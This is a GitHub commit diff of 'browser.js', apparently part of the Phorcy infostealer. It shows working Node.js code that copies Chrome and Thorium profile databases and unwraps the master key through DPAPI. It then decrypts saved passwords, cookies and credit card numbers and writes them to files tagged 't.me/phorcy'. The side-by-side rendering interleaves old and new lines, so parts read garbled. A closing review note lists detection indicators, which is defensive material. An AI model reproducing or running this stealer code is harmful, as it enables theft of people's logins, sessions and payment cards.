Update browser.js

gumbobr0t
2023-11-20 20:52:46 +01:00
committed by GitHub
parent b34853e802
commit dcd41428c7


@@ -1,23 +1,35 @@
const os = require('os'); const os = require('os');
const fs = require('fs'); const fs = require('fs');
const sqlite3 = require('sqlite3').verbose(); const sqlite3 = require('sqlite3').verbose();
const dpapi = require('./node-dpapi');
const crypto = require('crypto') const crypto = require('crypto')
const path = require('path') const path = require('path')
const dpapi = require('./node-dpapi');
class BrowserStealing { class BrowserStealing {
constructor() { constructor() {
this.phorcyDir = path.join(os.homedir(), 'AppData', 'Roaming', 'Phorcy') this.local = process.env.LOCALAPPDATA
this.browserPaths = [path.join(os.homedir(), 'AppData', 'Local', 'Google', 'Chrome', 'User Data'), path.join(os.homedir(), 'AppData', 'Local', 'Thorium', 'User Data')] this.phorcyDir = path.join(this.local, 'Phorcy');
this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5'] this.browserPaths = [path.join(this.local, 'Google', 'Chrome', 'User Data'), path.join(this.local, 'Thorium', 'User Data')];
this.password_command = 'SELECT action_url, username_value, password_value FROM logins'; this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5'];
//this.cookie_command = 'SELECT * FROM cookies'; this.tempDir = path.join(this.local, 'Temp');
this.tempDir = `${os.homedir()}\\AppData\\Local\\Temp`;
this.tempDirCreated = `${this.tempDir}\\${Math.random().toString(36).substring(7)}`;
this.passwordFile = path.join(this.phorcyDir, 'browser_passwords.txt')
//this.cookie_count = 0 this.password_command = 'SELECT action_url, username_value, password_value FROM logins';
this.password_count = 0 this.cookie_command = 'SELECT host_key, name, encrypted_value, expires_utc FROM cookies';
this.cc_command = 'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards';
//this.history_command = 'SELECT url, title, last_visit_time FROM urls';
//this.downloads_command = 'SELECT tab_url, target_path FROM downloads';
this.passwordFile = path.join(this.phorcyDir, 'browser_passwords.txt');
this.cookieFile = path.join(this.phorcyDir, 'browser_cookies.txt');
this.ccFile = path.join(this.phorcyDir, 'browser_creditcards.txt');
//this.historyFile = path.join(this.phorcyDir, 'browser_history.txt');
//this.downloadsFile = path.join(this.phorcyDir, 'browser_downloads.txt');
this.password_count = 0;
this.cookie_count = 0;
this.cc_count = 0;
//this.history_count = 0;
//this.downloads_count = 0;
} }
generateRandomString() { generateRandomString() {
@@ -25,149 +37,291 @@ class BrowserStealing {
return `${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}`; return `${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}`;
} }
async getPasswords() { fileExists(filePath) {
fs.mkdir(this.tempDirCreated, (error) => { try {
if (error) { fs.accessSync(filePath, fs.constants.F_OK);
console.error('Error creating temp directory:', error); return true;
return; } catch (err) {
return false;
}
} }
console.log('Temp Directory created successfully.');
for (const browserPath of this.browserPaths) {
console.log(browserPath);
const local_state = path.join(browserPath, 'Local State');
console.log(local_state);
fs.readFile(local_state, 'utf8', (err, data) => { getKey(local_stateFile, callback) {
fs.readFile(local_stateFile, 'utf8', (err, data) => {
if (err) { if (err) {
console.error('Error reading local state file:', err); console.error(err);
return; return;
} }
const encrypted = Buffer.from(JSON.parse(data).os_crypt.encrypted_key, 'base64').slice(5); const encryptedKey = Buffer.from(JSON.parse(data).os_crypt.encrypted_key, 'base64').slice(5);
const decrypted = dpapi.unprotectData(Buffer.from(encrypted,"utf-8"), null, "CurrentUser"); const decryptedKey = dpapi.unprotectData(encryptedKey, null, "CurrentUser");
console.log('Decryption Key:', decrypted); console.log('Decryption Key:', decryptedKey);
for (const profile of this.browserProfiles) { //return decryptedKey;
const password_file = path.join(browserPath, profile, 'Login Data') callback(null, decryptedKey);
console.log(password_file) });
const decryption_file = path.join(this.tempDirCreated, this.generateRandomString())
console.log(decryption_file)
fs.copyFile(password_file, decryption_file, (error) => {
if (error) {
console.error('Error copying login data file:', error);
return;
} }
console.log('Login data file copied successfully.');
const db = new sqlite3.Database(decryption_file, sqlite3.OPEN_READWRITE, (err) => { getPassword(loginFile, masterKey) {
const tempFile = path.join(this.tempDir, this.generateRandomString());
fs.copyFile(loginFile, tempFile, (err) => {
if (err) { if (err) {
console.error('Error opening login database:', err); console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return; return;
} }
db.all(this.password_command, (err, rows) => { db.all(this.password_command, (err, rows) => {
if (err) { if (err) {
console.error('Error executing login SQLite command:', err); console.error(err);
} else { } else {
const formattedRows = rows.map(row => { rows.map(row => {
if (row && row['password_value']) { if (row && row['password_value']) {
let password_value = row['password_value']; let password_value = row['password_value'];
let start = password_value.slice(3, 15), let start = password_value.slice(3, 15),
middle = password_value.slice(15, password_value.length - 16), middle = password_value.slice(15, password_value.length - 16),
end = password_value.slice(password_value.length - 16, password_value.length), end = password_value.slice(password_value.length - 16, password_value.length),
decipher = crypto.createDecipheriv('aes-256-gcm', decrypted, start); decipher = crypto.createDecipheriv('aes-256-gcm', masterKey, start);
decipher.setAuthTag(end); decipher.setAuthTag(end);
this.password_count++; this.password_count++;
try { try {
const formattedContent = `+------------------------+\n| URL: ${row.action_url ? row.action_url.toString() : ''} |\n| Username: ${row.username_value ? row.username_value.toString() : ''} |\n| Password: ${decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString()} |\n`; const passwordList = `+------------------------+\n| URL: ${row.action_url ? row.action_url.toString() : ''} |\n| Username: ${row.username_value ? row.username_value.toString() : ''} |\n| Password: ${decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString()} |\n`;
fs.writeFileSync(this.passwordFile, passwordList, { flag: 'a' });
fs.writeFileSync(this.passwordFile, formattedContent, { flag: 'a' });
console.log(`Password written to file successfully.`);
} catch (err) { } catch (err) {
console.error('Error writing password to file:', err); console.error(err);
} }
//return {
// action_url: row.action_url ? row.action_url.toString() : '',
// username_value: row.username_value ? row.username_value.toString() : '',
// password_value: decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString(),
//};
} else {
return {
action_url: '',
username_value: '',
password_value: '',
};
} }
}); });
console.log('Password list:', formattedRows);
console.log('Password count:', this.password_count);
} }
db.close((err) => { db.close((err) => {
if (err) { if (err) {
console.error('Error closing login database:', err); console.error(err);
} }
}); });
console.log('Password count:', this.password_count)
}); });
}); });
}); });
fs.unlink(decryption_file, (error) => {
if (error) {
console.error('Error deleting decryption password file:', error);
} else {
console.log('Decryption password File deleted successfully.');
}
});
}
});
}
});
}
cleanUp() {
fs.rm(this.tempDirCreated, { recursive: true }, (error) => {
if (error) {
console.error('Error deleting temp directory:', error);
} else {
console.log('Temp Directory deleted successfully.');
}
});
fs.rm(this.phorcyDir, { recursive: true }, (error) => { if (this.fileExists(tempFile)) {
if (error) { fs.unlink(tempFile, (err) => {
console.error('Error deleting Phorcy directory:', error); if (err) {
} else { console.error(err);
console.log('Phorcy Directory deleted successfully.');
} }
}); });
} }
};
getCookie(cookieFile, masterKey) {
const tempFile = path.join(this.tempDir, this.generateRandomString());
fs.copyFile(cookieFile, tempFile, (err) => {
if (err) {
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.cookie_command, (err, rows) => {
if (err) {
console.error(err);
} else {
let decrypted;
rows.map(row => {
if (row && row['encrypted_value']) {
let cookie_value = row['encrypted_value'];
let first = cookie_value.slice(3, 15),
middle = cookie_value.slice(
15,
cookie_value.length - 16
),
end = cookie_value.slice(cookie_value.length-16,cookie_value.length),decipher=crypto.createDecipheriv("aes-256-gcm",masterKey,first);
decipher.setAuthTag(end),decrypted=decipher.update(middle,"base64","utf-8")+decipher.final("utf-8");
this.cookie_count++;
async prepare() {
try { try {
fs.mkdirSync(this.phorcyDir); const cookieList = `+------------------------+\n| Host: ${row["host_key"]} |\n| Name: ${row.name ? row.name.toString() : ''} |\n| Cookie value: ${decrypted} |\n| Expiration: ${row['expires_utc']} |\n`;
console.log('Phorcy Directory created successfully.'); fs.writeFileSync(this.cookieFile, cookieList, { flag: 'a' });
} catch (err) { } catch (err) {
console.error('Error creating Phorcy directory:', err.message) console.error(err);
} }
} }
});
}
db.close((err) => {
if (err) {
console.error(err);
}
});
console.log('Cookie count:', this.cookie_count)
});
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
getCreditCard(ccFile, masterKey) {
const tempFile = path.join(this.tempDir, this.generateRandomString());
fs.copyFile(ccFile, tempFile, (err) => {
if (err) {
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.cc_command, (err, rows) => {
if (err) {
console.error(err);
} else {
let decrypted;
rows.map(row => {
if (row && row['card_number_encrypted']) {
let cc_value = row['card_number_encrypted'];
let first = cc_value.slice(3, 15),
middle = cc_value.slice(
15,
cc_value.length - 16
),
end = cc_value.slice(cc_value.length-16,cc_value.length),decipher=crypto.createDecipheriv("aes-256-gcm",masterKey,first);
decipher.setAuthTag(end),decrypted=decipher.update(middle,"base64","utf-8")+decipher.final("utf-8");
this.cc_count++;
try {
const ccList = `+------------------------+\n| Name: ${row['name_on_card']} |\n| Credit Card Number: ${decrypted} |\n| Expiration: ${row['expiration_month']}/${row['expiration_year']} |\n`;
fs.writeFileSync(this.ccFile, ccList, { flag: 'a' });
} catch (err) {
console.error(err);
}
}
});
}
db.close((err) => {
if (err) {
console.error(err);
}
});
console.log('Credit Card count:', this.cc_count)
});
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
async Main() { async Main() {
await this.prepare(); // password grabber
await this.getPasswords(); fs.writeFileSync(this.passwordFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
setTimeout(function() { for (const browserPath of this.browserPaths) {
console.log("Browser stealing complete. Cleaning."); if (this.fileExists(browserPath)) {
this.cleanUp(); const localState = path.join(browserPath, 'Local State');
}.bind(this), 4000); if (this.fileExists(localState)) {
for (const profile of this.browserProfiles) {
const passwordFile = path.join(browserPath, profile, 'Login Data');
if (this.fileExists(passwordFile)) {
try {
this.getKey(localState, (err, key) => {
if (err) {
console.error(err);
} else {
this.getPassword(passwordFile, key);
}
});
} catch (err) {
console.error(err);
}
}
}
}
}
}
// cookie grabber
fs.writeFileSync(this.cookieFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
for (const browserPath of this.browserPaths) {
if (this.fileExists(browserPath)) {
const localState = path.join(browserPath, 'Local State');
if (this.fileExists(localState)) {
for (const profile of this.browserProfiles) {
const cookieFile = path.join(browserPath, profile, 'Network', 'Cookies');
if (this.fileExists(cookieFile)) {
try {
this.getKey(localState, (err, key) => {
if (err) {
console.error(err);
} else {
this.getCookie(cookieFile, key);
}
});
} catch (err) {
console.error(err);
}
}
}
}
}
}
// cc grabber
fs.writeFileSync(this.ccFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
for (const browserPath of this.browserPaths) {
if (this.fileExists(browserPath)) {
const localState = path.join(browserPath, 'Local State');
if (this.fileExists(localState)) {
for (const profile of this.browserProfiles) {
const ccFile = path.join(browserPath, profile, 'Web Data');
if (this.fileExists(ccFile)) {
try {
this.getKey(localState, (err, key) => {
if (err) {
console.error(err);
} else {
this.getCreditCard(ccFile, key);
}
});
} catch (err) {
console.error(err);
}
}
}
}
}
}
} }
} }
const browserStealer = new BrowserStealing(); const browserStealer = new BrowserStealing()
browserStealer.Main(); browserStealer.Main()
console.log('Hello, World!')
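Review bot: For detection, the constructor and `Main()` on the new side hard-code every artefact a defender needs. Output is appended to `browser_passwords.txt`, `browser_cookies.txt` and `browser_creditcards.txt` under `%LOCALAPPDATA%\Phorcy`, and each file opens with the literal `t.me/phorcy`, which is a stable string for content and YARA-style scanning. The behavioural signal is a non-browser process reading `Local State`, `Login Data`, `Network\Cookies` and `Web Data` under the Chrome and Thorium `User Data` trees and then unwrapping `os_crypt.encrypted_key` through DPAPI in `CurrentUser` scope. DPAPI at that scope does not tell one process in the user's session from another, so file-access auditing on those paths is the dependable control. `cleanUp()` and `prepare()` appear only on the old side, so on hosts where the `Phorcy` directory exists it probably stays on disk after this version runs and is worth collecting during triage. The side-by-side rendering makes old/new attribution uncertain, so confirm this against the raw file.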